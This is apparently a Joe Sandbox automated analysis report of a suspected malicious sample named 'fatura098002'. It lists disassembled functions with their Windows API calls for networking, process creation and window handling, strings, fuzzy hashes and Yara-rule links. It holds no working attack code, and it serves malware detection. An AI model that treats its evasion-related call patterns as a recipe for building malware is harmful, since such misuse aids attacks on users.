Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 1a88bc8b0de8f602c59c1ab3208ff26d0d59eea106f6273432b6158dcc4b6f52
Instruction ID: db63a0f3cf686d6314ca15daac884ad3203ae0741cf32d1649ccc31f64b4c37b
Opcode Fuzzy Hash: 1a88bc8b0de8f602c59c1ab3208ff26d0d59eea106f6273432b6158dcc4b6f52
Instruction Fuzzy Hash: 345180E1A1C102D6EB39B718ED453793BA4EF40741F308958F4D6462EBEB3D8C81DA46

Function 00787771 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(0075569E,00000000,?,0079CC08,?,00000000,00000000), ref: 007878DD

Part of subcall function 00706B57: _wcslen.LIBCMT ref: 00706B6A

CharUpperBuffW.USER32(0075569E,00000000,?,0079CC08,00000000,?,00000000,00000000), ref: 0078783B

Strings

<s|, xrefs: 007877C8

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: BuffCharUpper$_wcslen
String ID: <s|
API String ID: 3544283678-2408698564
Opcode ID: d592ba883cb3cc0114109ba2274725f60cefc7e0fbb77d375b32ce28276fcab1
Instruction ID: 20ce6976da44fd6cf6fdc0c53e068bd3e541a84215595a174a5775d2d2755b25
Opcode Fuzzy Hash: d592ba883cb3cc0114109ba2274725f60cefc7e0fbb77d375b32ce28276fcab1
Instruction Fuzzy Hash: F4612E72954219EACF09FBA4CC95DFDB3B8BF14700B544229E543A71D1EF38AA45CBA0

Function 0071E187 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

#, xrefs: 0071E1B1

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 190dc18d0f9dac89eaebc211384adb09977881cc2b7a2c17e38fa567453ba28e
Instruction ID: fac7f0df898cfa2557e85548c5af8b3b4e6378943e154320294702d44b156651
Opcode Fuzzy Hash: 190dc18d0f9dac89eaebc211384adb09977881cc2b7a2c17e38fa567453ba28e
Instruction Fuzzy Hash: 13515271900256DFDB19DF28C091AFA7BA8FF19310F248415FC919B2C0DA7C9E86CBA0

Function 0071F291 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 0071F2A2
GlobalMemoryStatusEx.KERNEL32(?), ref: 0071F2BB

Strings

@, xrefs: 0071F2AF

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 2155aa0a9391c3ad5a58f068b639d064e7d3d3d36536d834b7339fdcefbf0168
Instruction ID: 759c0322980b015ac703704a3c7b4c033dc6a8b7d2531de174c92989b4a9e0a8
Opcode Fuzzy Hash: 2155aa0a9391c3ad5a58f068b639d064e7d3d3d36536d834b7339fdcefbf0168
Instruction Fuzzy Hash: D7512772408745DBD320AF10D88ABABBBF8FB84300F818A5DF19941195EB749529CB67

Function 00785745 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 007857E0
_wcslen.LIBCMT ref: 007857EC

Strings

CALLARGARRAY, xrefs: 007857E6, 007857EB

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: BuffCharUpper_wcslen
String ID: CALLARGARRAY
API String ID: 157775604-1150593374
Opcode ID: 18ca9181e55ea942d80fc82c0b44923d8bf74e1033ae346d345875594ac3d90b
Instruction ID: 36e6eb978c583e43ff77ef27962fed673ecde4b57c7153c2534e242ca427ef7e
Opcode Fuzzy Hash: 18ca9181e55ea942d80fc82c0b44923d8bf74e1033ae346d345875594ac3d90b
Instruction Fuzzy Hash: 6F419D31A40209DFCB04EFA8C8859AEBBF5EF59320F10416AE505A7291E7789D81CBA0

Function 0077D0F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0077D130
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 0077D13A

Strings

|, xrefs: 0077D10B

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: CrackInternet_wcslen
String ID: |
API String ID: 596671847-2343686810
Opcode ID: 43de93606ad3ddee5dad01ff17ee771928cc0b1a1a76a15f3ea5088e36f35d76
Instruction ID: d2f60cb8892369ea6f2e2c82adc380ccf0ffa7cd0ce7522a82b643200eef464b
Opcode Fuzzy Hash: 43de93606ad3ddee5dad01ff17ee771928cc0b1a1a76a15f3ea5088e36f35d76
Instruction Fuzzy Hash: 0E313071D00219EBCF15EFA4CC89AEE7FB9FF04340F404119F919A61A2E739A956CB60

Function 0079356C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00793621
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0079365C

Strings

static, xrefs: 007935BC

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: ac84f87900346f8c965e17215a3db48502c8d0a0b1a4605eb9da9d6dfca267bb
Instruction ID: 0642f1f5fc60686db2bec77392173ae7fa2a45e33e465991569afa6bcb05aecb
Opcode Fuzzy Hash: ac84f87900346f8c965e17215a3db48502c8d0a0b1a4605eb9da9d6dfca267bb
Instruction Fuzzy Hash: 62318D71100604AADF10DF78EC81EFB73A9FF88724F009619F8A5D7280DA39AD91D760

Function 00794537 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 0079461F
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00794634

Strings

', xrefs: 0079458E

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: cc4a884f4712e469e016a9bf1fde3e0405a66653af4c8cfaa038d48100bfe805
Instruction ID: 730b1abec8fb2a42f3b1ff864b80f080653ff5153a4e5e806c07e92786adf670
Opcode Fuzzy Hash: cc4a884f4712e469e016a9bf1fde3e0405a66653af4c8cfaa038d48100bfe805
Instruction Fuzzy Hash: 9E3148B5A01209AFDF14CFA9D990FDA7BB5FF09300F11416AE904AB341D734A952CF90

Function 007931EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0079327C
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00793287

Strings

Combobox, xrefs: 00793249

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 23ccd10cdb54e13695d22fb25cb45528b319eaf6de557e865a763c729c9b3c5c
Instruction ID: 03fe1b01f8bddba311d5faa4f1125ddd2132d8abefe2b5fc22d4db77979ffffc
Opcode Fuzzy Hash: 23ccd10cdb54e13695d22fb25cb45528b319eaf6de557e865a763c729c9b3c5c
Instruction Fuzzy Hash: 4011B271300208BFFF25DF94EC84EBB3BAAFB94364F104129F91897290D6399D518760

Function 00793710 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 0070600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0070604C
Part of subcall function 0070600E: GetStockObject.GDI32(00000011), ref: 00706060
Part of subcall function 0070600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0070606A

GetWindowRect.USER32(00000000,?), ref: 0079377A
GetSysColor.USER32(00000012), ref: 00793794

Strings

static, xrefs: 00793757

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 6125cd42fd3ab620c38f418337c6a0ed3a9793ba271912624e3ef7e8806ffefe
Instruction ID: 371b55861e451eb338e52746da79d4a7bfcc62773b54aac2a7e7d2a25feb05b8
Opcode Fuzzy Hash: 6125cd42fd3ab620c38f418337c6a0ed3a9793ba271912624e3ef7e8806ffefe
Instruction Fuzzy Hash: 781137B2610209AFDF01DFB8DC86EEA7BF8FB08314F004915F955E2250E739E8619B60

Function 0077CD1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0077CD7D
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0077CDA6

Strings

<local>, xrefs: 0077CD66

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 17c0059f5b95f66c509a50886c96c90de4e5e2e53e345a4e36cb2a131cb69533
Instruction ID: 28e6d202965c43414be2bacd24c2efb4b0a31d5e685f33e02c64b0d9eb2cff6c
Opcode Fuzzy Hash: 17c0059f5b95f66c509a50886c96c90de4e5e2e53e345a4e36cb2a131cb69533
Instruction Fuzzy Hash: AD11A371305631BADB364A668C45EE7BEA8EB1A7E4F00822EB10D82180D6689841D6F0

Function 00793429 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 007934AB
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 007934BA

Strings

edit, xrefs: 0079348F

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: c49744a53165de2335519da119a3abf3b49ee194340727e0c119389b976690c2
Instruction ID: 00feced8b296c065c8930d69715bdbc9d3475105495e568fa6cc185b57f587d2
Opcode Fuzzy Hash: c49744a53165de2335519da119a3abf3b49ee194340727e0c119389b976690c2
Instruction Fuzzy Hash: 7E118C71100248ABEF128F64EC44ABB3BAAEB05378F518724F965931E0C779EC519B64

Function 00766C86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 00709CB3: _wcslen.LIBCMT ref: 00709CBD

CharUpperBuffW.USER32(?,?,?), ref: 00766CB6
_wcslen.LIBCMT ref: 00766CC2

Strings

STOP, xrefs: 00766CBC, 00766CC1

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: STOP
API String ID: 1256254125-2411985666
Opcode ID: 40745e9104cdf853e386e24fe322f91c99681405114a0081f41d7e12acd71776
Instruction ID: 4862b81aa9de1723f5e36f510333dcb97ee23d9bba82dc5b7039fef469b0cfde
Opcode Fuzzy Hash: 40745e9104cdf853e386e24fe322f91c99681405114a0081f41d7e12acd71776
Instruction Fuzzy Hash: C301C032A00926CACB21AFBDDC959BF77A5EF61710B900528ED63961D1EB39E940C660

Function 00761BD8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00709CB3: _wcslen.LIBCMT ref: 00709CBD

Part of subcall function 00763CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00763CCA

SendMessageW.USER32(?,00000180,00000000,?), ref: 00761C46

Strings

ComboBox, xrefs: 00761BE5
ListBox, xrefs: 00761C10

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: c3a2522fd7123c1bb2a68167cf72f3e7090038cb6cad74157e627f74b616c522
Instruction ID: 04fbae3a86b6985f4f85448041ae7aa5cc88f4ec83ef24c6e45e7b8827510a5e
Opcode Fuzzy Hash: c3a2522fd7123c1bb2a68167cf72f3e7090038cb6cad74157e627f74b616c522
Instruction Fuzzy Hash: D401A7B5A81104E6DB04EBA0C95AEFF77E89B11340F540019BD17672C2EA2D9E18D7B1

Function 0071A4D6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 0071A529

Part of subcall function 00709CB3: _wcslen.LIBCMT ref: 00709CBD

Strings

,%}, xrefs: 0071A509
3yu, xrefs: 0071A545, 0071A54D, 0071A552

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: Init_thread_footer_wcslen
String ID: ,%}$3yu
API String ID: 2551934079-347936961
Opcode ID: 381eb0ddd302e8dda39cc47f6b4431a88e5ef27e91c2d2f95ae1a1832fe45942
Instruction ID: fc97476ec1df033fbd152875bb1dba91a4a856288fdd1aefd6f9de898750e180
Opcode Fuzzy Hash: 381eb0ddd302e8dda39cc47f6b4431a88e5ef27e91c2d2f95ae1a1832fe45942
Instruction Fuzzy Hash: 7701F731B06610EBCB00F76CA85FA9D33659B05750F504065F602572C3EE6C5D9286E7

Function 00798172 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,007D3018,007D305C), ref: 007981BF
CloseHandle.KERNEL32 ref: 007981D1

Strings

\0}, xrefs: 0079818A

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007CC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007EC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.0000000000832000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422002080.0000000000838000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000839000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1422023338.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_700000_fatura098002.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: \0}
API String ID: 3712363035-1796552116
Opcode ID: 3e06f57b887d4d4eca668d6d48309c49453150f9ee970c20ccd3610d421685cd
Instruction ID: 093467c986b53ba450a028d33ca371846265aa7f1932682456498fd97b0d34e3
Opcode Fuzzy Hash: 3e06f57b887d4d4eca668d6d48309c49453150f9ee970c20ccd3610d421685cd
Instruction Fuzzy Hash: 63F05EB1641314BBF720A761AC49FB73B6DDB05750F008422BB08D51A2D67D8A0183BE

Function 0078747E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00787493
_wcslen.LIBCMT ref: 007874B9

Strings

3, 3, 16, 1, xrefs: 00787483

Memory Dump Source

Source File: 00000000.00000002.1421823773.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true

Associated: 00000000.00000002.1421777864.0000000000700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421823773.00000000007C2000.00000040.00000001.01000000.00000003.sdmpDownload File
